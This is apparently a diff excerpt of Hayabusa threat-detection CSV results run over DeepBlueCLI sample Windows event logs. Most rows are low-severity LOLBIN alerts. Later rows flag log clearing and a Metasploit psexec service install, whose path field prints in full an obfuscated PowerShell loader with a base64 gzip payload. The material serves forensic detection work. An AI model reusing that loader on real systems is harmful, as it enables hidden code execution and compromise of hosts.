+2016-09-20 22:07:43.000 +09:00,IE10Win7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,../hayabusa-rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2016-09-20 22:07:44.179 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\dllhost.exe /Processid:{F3F72FE3-CF58-4A21-BBED-F596E5AFE5C0} | Path: C:\Windows\System32\dllhost.exe | PID: 0x6e8 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 22:07:44.757 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\dllhost.exe /Processid:{02D4B3F1-FD88-11D1-960D-00805FC79235} | Path: C:\Windows\System32\dllhost.exe | PID: 0x1c0 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 22:07:58.039 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x9a0 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 22:07:58.101 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: gpscript.exe /Logon | Path: C:\Windows\System32\gpscript.exe | PID: 0xa00 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 22:07:59.540 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xb84 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 22:08:00.110 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Wallpaper\autologon.bat"" "" | Path: C:\Windows\System32\cmd.exe | PID: 0xc1c | User: IEUser | LID: 0x6793c",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 22:08:00.615 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\wallpaper\bginfo.exe C:\wallpaper\bgconfig.bgi /timer:0 | Path: C:\Wallpaper\Bginfo.exe | PID: 0xc38 | User: IEUser | LID: 0x6793c,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 22:08:01.982 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0xc5c | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 22:10:32.160 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\wuauclt.exe"" /RunHandlerComServer | Path: C:\Windows\System32\wuauclt.exe | PID: 0x3a0 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 22:20:59.082 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\RunDll32.exe"" ""C:\Windows\system32\WerConCpl.dll"", LaunchErcApp -responsepester | Path: C:\Windows\System32\rundll32.exe | PID: 0x87c | User: IEUser | LID: 0x6796c",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 22:25:15.535 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\rundll32.exe aepdu.dll,AePduRunUpdate | Path: C:\Windows\System32\rundll32.exe | PID: 0xa00 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 23:02:21.413 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x11c | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 23:02:21.475 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x720 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 23:03:25.976 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x824 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 23:03:26.007 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x6b4 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 23:54:49.500 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\rundll32.exe /d acproxy.dll,PerformAutochkOperations | Path: C:\Windows\System32\rundll32.exe | PID: 0xc60 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-21 00:10:43.213 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x72c | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-21 00:10:56.112 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0xe88 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-21 00:10:56.268 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" /l:""C:\Users\IEUser\Documents\511-evtx\Win7-application.evtx"" | Path: C:\Windows\System32\eventvwr.exe | PID: 0xaf4 | User: IEUser | LID: 0x6796c",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-21 00:10:56.315 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xad8 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-21 00:10:56.331 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xa30 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-21 00:10:56.346 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" /l:""C:\Users\IEUser\Documents\511-evtx\Win7-application.evtx"" | Path: C:\Windows\System32\eventvwr.exe | PID: 0x1a8 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-21 00:10:56.377 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" /l:""C:\Users\IEUser\Documents\511-evtx\Win7-application.evtx"" | Path: C:\Windows\System32\mmc.exe | PID: 0xd08 | User: IEUser | LID: 0x6793c",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-21 00:45:12.871 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0xb34 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-21 00:45:18.574 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x8d4 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-21 00:45:25.147 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x270 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-21 00:46:27.941 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0xc90 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-21 00:46:32.738 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x8e0 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-21 01:33:53.404 +09:00,IE10Win7,1102,high,Evas,Security Log Cleared,User: IEUser,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-powershell-target-security.evtx
+2016-09-21 01:34:04.272 +09:00,IE10Win7,104,high,Evas,System Log File Cleared,User: IEUser,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-powershell-target-system.evtx
+2016-09-21 01:35:46.590 +09:00,IE10Win7,7045,high,Persis,Malicious Service Possibly Installed,"Svc: UWdKhYTIQWWJxHfx | Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIAGFl4VcCA71WW4/aOhB+bqX+h6hCIlFZEli6N6nScYAAy2Vhw52iI5M4weDEbOJw6+l/PxMge2m31Z4+nAgU2zPjGX/zjSdO5FuCcl+aF8YW77iE9KRvH96/a+MAe5Kcmq0rV5uutY5mopKRUq6rcU625Yd6V3n3DvRS++uRJ32R5AlarUrcw9Sf3twUoyAgvjjOsxUiUBgSb8YoCWVF+kcazElAzu5mC2IJ6ZuU+jtbYXyG2UltV8TWnEhnyLdjWYNbOI4xa64YFXL669e0MjnLTbPlhwizUE6bu1AQL2szllak70rssLtbETndpFbAQ+6I7ID65/lszw+xQ1qw25o0iZhzO0wrcAr4BUREgS8dzhNvcBTLaRi2A24h2w5ICNrZmr/mSyKn/IixjPSXPDl5v498QT0CckECvjJJsKYWCbNV7NuM3BNnKrfIJjn0W43k50ag1RaBkoG8vBJmk9sRI0fLtPJzoC9yqcDzQz4BiO8f3n947ySU8C6CVWtPLxcbhJ+TAkbvJocxgajlNg/pQf+LpGWkJvjHggc7mKa6QUSUqTSJszGZTqWUPeyagdjVM7/eI5cYgPreEMM1h8VJn1N7CkanbKUs9hB7+A3rSsShPintfOxRKyGW/FoOiMPI4cTZRK0FYcnpk4DYJcKIi0WMakaa/GxW9qh4tNUjymwSIAvyGEJUkGLlZTDHRMnpmt8kHiB1nKchHQ7QmSTaJwrvEu/xHJTSRYbDMCO1I6gnKyOZBDNiZyTkh/QkQpHgh2H6KdxmxAS1cCiS7aZKguPJX5H7oQgiC5IHZ++aK2JRzGIoMlKV2kTfmdRN/KZfBaKIGaO+CzutIRGwEgNgipgSAYT4mH4laxJR81aMeKB3KG6DYRdK+VQQBx5hl9jpH6NMCH9kd4xHAsSzGCHJJuMiI/VpIOCOiLE9cunPg3h2RxzCKQbklBQ5qZyJvhMxz1MMF+dHfp4wOiASCEDDCLin45BcFEwRAFbyR/WOFhE8o5rPmpa+pDm0oblaE/49el7jpUu7fruoqkFpO3dQLaw1q+1Sp1otrG/NfkGY5Zqot2uiWR4uFiaq3vdGYlxD1S7VlqPCfnVL92YD2aOterHX9xtN3+4Xru2MSo7jXjrmfe6zQRuDYkfX8rhRKkeNgb7RtUJYpptqh/Y6y1tDzEZ9hnuO6g5z15huG8Gin+PNfQ2hyvzc2t86/cq8ae9GVfV6UFiiMkJFv9w3dF4f6QFqq33s9vmmvqiwgVtEumFRMu70DL3TMXTUqyweSteqC7ZDPNcH/Twdr4b3c5gbEEJd1Qo1m+z5qAMgVTjC7j3ouMW8NXdAp/QJ6Z9aPMzjpc6RDjrG+AHiGq2MNgN5t5fnqM9aQ4wa452hqrlRu4CqGh1UXBRviV29g1G4Lu1Laq5vc3vwuTVy1P6QXaqlYndlOaqqbqqlujXOba/uLgu69lD0qMdmeVu97l3p/qbutteu3Rlc3m9buxn466lq/2PMGqBNavHZu9IuF8/o8Ktrv4mDcI4Z0ATu86RQDR4Ypyu5zWlsIcvPuvWSBD5h0Nyg/SV8R4xxK+4TL65w6FXHDjKF4u3B8Dz/6kiRHhWVpz6SLN3cjCFmqKMjybMN4rtintG255oG97+2LWhw8LeftMhXO/m0WSbuIAleTy7YwYUSl1hqMdg0L5bV1f+B5qnE5/Cy34rm09pvpG9CWMs8IvGT5OXCf8L7D7EYYCpA34Qri5FjA/09JCcuPfsQSVIHXHFOT/wxeBeJsxZ8o/wLs66tlosKAAA=''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-powershell-target-system.evtx
+2016-09-21 01:35:46.590 +09:00,IE10Win7,7045,high,Persis,Suspicious Service Installed,"Svc: UWdKhYTIQWWJxHfx | Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIAGFl4VcCA71WW4/aOhB+bqX+h6hCIlFZEli6N6nScYAAy2Vhw52iI5M4weDEbOJw6+l/PxMge2m31Z4+nAgU2zPjGX/zjSdO5FuCcl+aF8YW77iE9KRvH96/a+MAe5Kcmq0rV5uutY5mopKRUq6rcU625Yd6V3n3DvRS++uRJ32R5AlarUrcw9Sf3twUoyAgvjjOsxUiUBgSb8YoCWVF+kcazElAzu5mC2IJ6ZuU+jtbYXyG2UltV8TWnEhnyLdjWYNbOI4xa64YFXL669e0MjnLTbPlhwizUE6bu1AQL2szllak70rssLtbETndpFbAQ+6I7ID65/lszw+xQ1qw25o0iZhzO0wrcAr4BUREgS8dzhNvcBTLaRi2A24h2w5ICNrZmr/mSyKn/IixjPSXPDl5v498QT0CckECvjJJsKYWCbNV7NuM3BNnKrfIJjn0W43k50ag1RaBkoG8vBJmk9sRI0fLtPJzoC9yqcDzQz4BiO8f3n947ySU8C6CVWtPLxcbhJ+TAkbvJocxgajlNg/pQf+LpGWkJvjHggc7mKa6QUSUqTSJszGZTqWUPeyagdjVM7/eI5cYgPreEMM1h8VJn1N7CkanbKUs9hB7+A3rSsShPintfOxRKyGW/FoOiMPI4cTZRK0FYcnpk4DYJcKIi0WMakaa/GxW9qh4tNUjymwSIAvyGEJUkGLlZTDHRMnpmt8kHiB1nKchHQ7QmSTaJwrvEu/xHJTSRYbDMCO1I6gnKyOZBDNiZyTkh/QkQpHgh2H6KdxmxAS1cCiS7aZKguPJX5H7oQgiC5IHZ++aK2JRzGIoMlKV2kTfmdRN/KZfBaKIGaO+CzutIRGwEgNgipgSAYT4mH4laxJR81aMeKB3KG6DYRdK+VQQBx5hl9jpH6NMCH9kd4xHAsSzGCHJJuMiI/VpIOCOiLE9cunPg3h2RxzCKQbklBQ5qZyJvhMxz1MMF+dHfp4wOiASCEDDCLin45BcFEwRAFbyR/WOFhE8o5rPmpa+pDm0oblaE/49el7jpUu7fruoqkFpO3dQLaw1q+1Sp1otrG/NfkGY5Zqot2uiWR4uFiaq3vdGYlxD1S7VlqPCfnVL92YD2aOterHX9xtN3+4Xru2MSo7jXjrmfe6zQRuDYkfX8rhRKkeNgb7RtUJYpptqh/Y6y1tDzEZ9hnuO6g5z15huG8Gin+PNfQ2hyvzc2t86/cq8ae9GVfV6UFiiMkJFv9w3dF4f6QFqq33s9vmmvqiwgVtEumFRMu70DL3TMXTUqyweSteqC7ZDPNcH/Twdr4b3c5gbEEJd1Qo1m+z5qAMgVTjC7j3ouMW8NXdAp/QJ6Z9aPMzjpc6RDjrG+AHiGq2MNgN5t5fnqM9aQ4wa452hqrlRu4CqGh1UXBRviV29g1G4Lu1Laq5vc3vwuTVy1P6QXaqlYndlOaqqbqqlujXOba/uLgu69lD0qMdmeVu97l3p/qbutteu3Rlc3m9buxn466lq/2PMGqBNavHZu9IuF8/o8Ktrv4mDcI4Z0ATu86RQDR4Ypyu5zWlsIcvPuvWSBD5h0Nyg/SV8R4xxK+4TL65w6FXHDjKF4u3B8Dz/6kiRHhWVpz6SLN3cjCFmqKMjybMN4rtintG255oG97+2LWhw8LeftMhXO/m0WSbuIAleTy7YwYUSl1hqMdg0L5bV1f+B5qnE5/Cy34rm09pvpG9CWMs8IvGT5OXCf8L7D7EYYCpA34Qri5FjA/09JCcuPfsQSVIHXHFOT/wxeBeJsxZ8o/wLs66tlosKAAA=''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s); | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-powershell-target-system.evtx
+2016-09-21 01:35:46.590 +09:00,IE10Win7,7045,info,Persis,Service Installed,"Name: UWdKhYTIQWWJxHfx | Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIAGFl4VcCA71WW4/aOhB+bqX+h6hCIlFZEli6N6nScYAAy2Vhw52iI5M4weDEbOJw6+l/PxMge2m31Z4+nAgU2zPjGX/zjSdO5FuCcl+aF8YW77iE9KRvH96/a+MAe5Kcmq0rV5uutY5mopKRUq6rcU625Yd6V3n3DvRS++uRJ32R5AlarUrcw9Sf3twUoyAgvjjOsxUiUBgSb8YoCWVF+kcazElAzu5mC2IJ6ZuU+jtbYXyG2UltV8TWnEhnyLdjWYNbOI4xa64YFXL669e0MjnLTbPlhwizUE6bu1AQL2szllak70rssLtbETndpFbAQ+6I7ID65/lszw+xQ1qw25o0iZhzO0wrcAr4BUREgS8dzhNvcBTLaRi2A24h2w5ICNrZmr/mSyKn/IixjPSXPDl5v498QT0CckECvjJJsKYWCbNV7NuM3BNnKrfIJjn0W43k50ag1RaBkoG8vBJmk9sRI0fLtPJzoC9yqcDzQz4BiO8f3n947ySU8C6CVWtPLxcbhJ+TAkbvJocxgajlNg/pQf+LpGWkJvjHggc7mKa6QUSUqTSJszGZTqWUPeyagdjVM7/eI5cYgPreEMM1h8VJn1N7CkanbKUs9hB7+A3rSsShPintfOxRKyGW/FoOiMPI4cTZRK0FYcnpk4DYJcKIi0WMakaa/GxW9qh4tNUjymwSIAvyGEJUkGLlZTDHRMnpmt8kHiB1nKchHQ7QmSTaJwrvEu/xHJTSRYbDMCO1I6gnKyOZBDNiZyTkh/QkQpHgh2H6KdxmxAS1cCiS7aZKguPJX5H7oQgiC5IHZ++aK2JRzGIoMlKV2kTfmdRN/KZfBaKIGaO+CzutIRGwEgNgipgSAYT4mH4laxJR81aMeKB3KG6DYRdK+VQQBx5hl9jpH6NMCH9kd4xHAsSzGCHJJuMiI/VpIOCOiLE9cunPg3h2RxzCKQbklBQ5qZyJvhMxz1MMF+dHfp4wOiASCEDDCLin45BcFEwRAFbyR/WOFhE8o5rPmpa+pDm0oblaE/49el7jpUu7fruoqkFpO3dQLaw1q+1Sp1otrG/NfkGY5Zqot2uiWR4uFiaq3vdGYlxD1S7VlqPCfnVL92YD2aOterHX9xtN3+4Xru2MSo7jXjrmfe6zQRuDYkfX8rhRKkeNgb7RtUJYpptqh/Y6y1tDzEZ9hnuO6g5z15huG8Gin+PNfQ2hyvzc2t86/cq8ae9GVfV6UFiiMkJFv9w3dF4f6QFqq33s9vmmvqiwgVtEumFRMu70DL3TMXTUqyweSteqC7ZDPNcH/Twdr4b3c5gbEEJd1Qo1m+z5qAMgVTjC7j3ouMW8NXdAp/QJ6Z9aPMzjpc6RDjrG+AHiGq2MNgN5t5fnqM9aQ4wa452hqrlRu4CqGh1UXBRviV29g1G4Lu1Laq5vc3vwuTVy1P6QXaqlYndlOaqqbqqlujXOba/uLgu69lD0qMdmeVu97l3p/qbutteu3Rlc3m9buxn466lq/2PMGqBNavHZu9IuF8/o8Ktrv4mDcI4Z0ATu86RQDR4Ypyu5zWlsIcvPuvWSBD5h0Nyg/SV8R4xxK+4TL65w6FXHDjKF4u3B8Dz/6kiRHhWVpz6SLN3cjCFmqKMjybMN4rtintG255oG97+2LWhw8LeftMhXO/m0WSbuIAleTy7YwYUSl1hqMdg0L5bV1f+B5qnE5/Cy34rm09pvpG9CWMs8IvGT5OXCf8L7D7EYYCpA34Qri5FjA/09JCcuPfsQSVIHXHFOT/wxeBeJsxZ8o/wLs66tlosKAAA=''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s); | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-powershell-target-system.evtx
+2016-09-21 01:35:46.605 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object 